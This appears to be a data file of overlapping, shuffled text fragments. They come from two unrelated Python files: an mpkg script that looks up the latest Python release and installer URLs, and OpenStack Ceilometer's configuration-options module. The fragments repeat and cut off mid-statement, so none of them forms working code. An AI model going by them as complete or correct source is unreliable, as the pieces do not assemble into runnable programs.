[ "Search class Package(Soft): ID = 'python' def _prepare(self): data = self.data links =", "= 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch =", "'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch = Search(links=links,", "= 'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'}", "_prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/'", "{'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)')", "mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self): data = self.data", "ID = 'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit':", "Package(Soft): ID = 'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe',", "self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url,", "mpkg.common import Soft from mpkg.utils import Search class Package(Soft): ID = 'python' def", "links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest:", "from mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self): data =", "= self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver =", "'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog", "'python' def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url", "class Package(Soft): ID = 'python' def _prepare(self): data = self.data links = {'32bit':", "from mpkg.common import Soft from mpkg.utils import Search class Package(Soft): ID = 'python'", "data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch = Search(links=links, ver=data.ver)", "Soft from mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self): data", "= {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 
'Latest: .*Python", "import Search class Package(Soft): ID = 'python' def _prepare(self): data = self.data links", "url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog' data.arch", "import Soft from mpkg.utils import Search class Package(Soft): ID = 'python' def _prepare(self):", "'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog'", "def _prepare(self): data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url =", "'64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver = Search(url, 'Latest: .*Python ([\\\\d\\\\.]+)') data.changelog =", "data = self.data links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe', '64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'} url = 'https://www.python.org/' data.ver" ]
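For readers without mpkg installed, a hedged sketch of what a Search(url, pattern) call presumably does here: fetch the page and return the first regex capture group. This is an illustration under that assumption, not mpkg's actual implementation, and search_version is a made-up name:

import re
import urllib.request

def search_version(url, pattern):
    # download the page and pull the first capture group out of it
    html = urllib.request.urlopen(url).read().decode('utf-8', 'replace')
    match = re.search(pattern, html)
    return match.group(1) if match else None

# e.g. search_version('https://www.python.org/', r'Latest: .*Python ([\d\.]+)')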
[ "ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options #", "discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS,", "Unless required by applicable law or agreed to in writing, software # distributed", "a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for", "import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import", "Apache License, Version 2.0 (the \"License\"); you may # not use this file", "ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery", "ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification',", "the License. You may obtain # a copy of the License at #", "may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS,", "itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials',", "eNovance # # Licensed under the Apache License, Version 2.0 (the \"License\"); you", "ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file", "with the License. 
You may obtain # a copy of the License at", "keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root", "ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage", "ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination',", "ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS,", "ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options", "ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts", "recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS,", "ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager", "to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS,", "use this file except in compliance with the License. 
You may obtain #", "('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)),", "ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts),", "ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client", "BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF", "ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS =", "implied. See the # License for the specific language governing permissions and limitations", "Copyright 2014 eNovance # # Licensed under the Apache License, Version 2.0 (the", "default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid in an AMQP", "you may # not use this file except in compliance with the License.", "import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import", "the options # for the password plugin that handles keystone v2 and v3", "KIND, either express or implied. See the # License for the specific language", "ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database',", "('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS),", "# under the License. import itertools import socket from keystoneauth1 import loading from", "import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this", "import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name", "ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter", "file except in compliance with the License. 
You may obtain # a copy", "socket from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app", "valid in an AMQP ' 'key. Can be an opaque identifier. For ZeroMQ", "requests. Set it to None to ' 'disable timeout.'), ] def list_opts(): #", "with discovery. But other options are possible. return [('service_credentials', ( loading.get_auth_common_conf_options() + loading.get_auth_plugin_conf_options('password')))]", "\"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express", "('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS),", "] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options #", "('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options # for", "('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi',", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)),", "ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS,", "distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY", "('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS,", "specific language governing permissions and limitations # under the License. 
import itertools import", "import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import", "import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import", "ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht):", "options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)),", "only the options # for the password plugin that handles keystone v2 and", "the # License for the specific language governing permissions and limitations # under", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "Set it to None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht):", "import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import", "None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces", "You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api',", "the generated configfile # This have been removed due to a recursive import", "import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import", "required by applicable law or agreed to in writing, software # distributed under", "ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling',", "ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw", "applicable law or agreed to in writing, software # distributed under the License", "('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', 
ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS),", "list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile # This have", "are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage',", "be valid in an AMQP ' 'key. Can be an opaque identifier. For", "ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS),", "in compliance with the License. You may obtain # a copy of the", "ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS),", "ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node,", "or agreed to in writing, software # distributed under the License is distributed", "only, must ' 'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout',", "ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>',", "import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import", "('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS),", "ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters", "host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests.", "License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS", "writing, software # distributed under the License is distributed on an \"AS IS\"", "('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains", 
"ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts),", "import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import", "import socket from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import", "under the License. import itertools import socket from keystoneauth1 import loading from oslo_config", "This have been removed due to a recursive import issue return [ ('DEFAULT',", "oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery", "the specific language governing permissions and limitations # under the License. import itertools", "an AMQP ' 'key. Can be an opaque identifier. For ZeroMQ only, must", "ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector", "to None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline", "valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP", "permissions and limitations # under the License. import itertools import socket from keystoneauth1", "Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not", "ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options # for the", "password plugin that handles keystone v2 and v3 API # with discovery. But", "import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import", "API # with discovery. But other options are possible. return [('service_credentials', ( loading.get_auth_common_conf_options()", "2.0 (the \"License\"); you may # not use this file except in compliance", "FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it", "import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import", "'key. Can be an opaque identifier. For ZeroMQ only, must ' 'be a", "# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT", "License, Version 2.0 (the \"License\"); you may # not use this file except", "Can be an opaque identifier. 
For ZeroMQ only, must ' 'be a valid", "'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated", "plugin that handles keystone v2 and v3 API # with discovery. But other", "('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only", "ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier',", "configfile # This have been removed due to a recursive import issue return", "ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of", "the License. import itertools import socket from keystoneauth1 import loading from oslo_config import", "import itertools import socket from keystoneauth1 import loading from oslo_config import cfg import", "ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute',", "ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration", "in an AMQP ' 'key. Can be an opaque identifier. For ZeroMQ only,", "loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector", "contains only the options # for the password plugin that handles keystone v2", "and limitations # under the License. import itertools import socket from keystoneauth1 import", "agreed to in writing, software # distributed under the License is distributed on", "the password plugin that handles keystone v2 and v3 API # with discovery.", "IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. 
Set it to None", "ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery", "' 'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout", "# Unless required by applicable law or agreed to in writing, software #", "readd pollster namespaces in the generated configfile # This have been removed due", "# This have been removed due to a recursive import issue return [", "by applicable law or agreed to in writing, software # distributed under the", "from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import", "under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "this node, which must be valid in an AMQP ' 'key. Can be", "import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import", "ZeroMQ only, must ' 'be a valid host name, FQDN, or IP address.'),", "name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set", "NOTE(sileht): the configuration file contains only the options # for the password plugin", "# # Licensed under the Apache License, Version 2.0 (the \"License\"); you may", "import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import", "except in compliance with the License. 
You may obtain # a copy of", "import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import", "import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import", "to in writing, software # distributed under the License is distributed on an", "import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import", "ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must", "OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be", "import 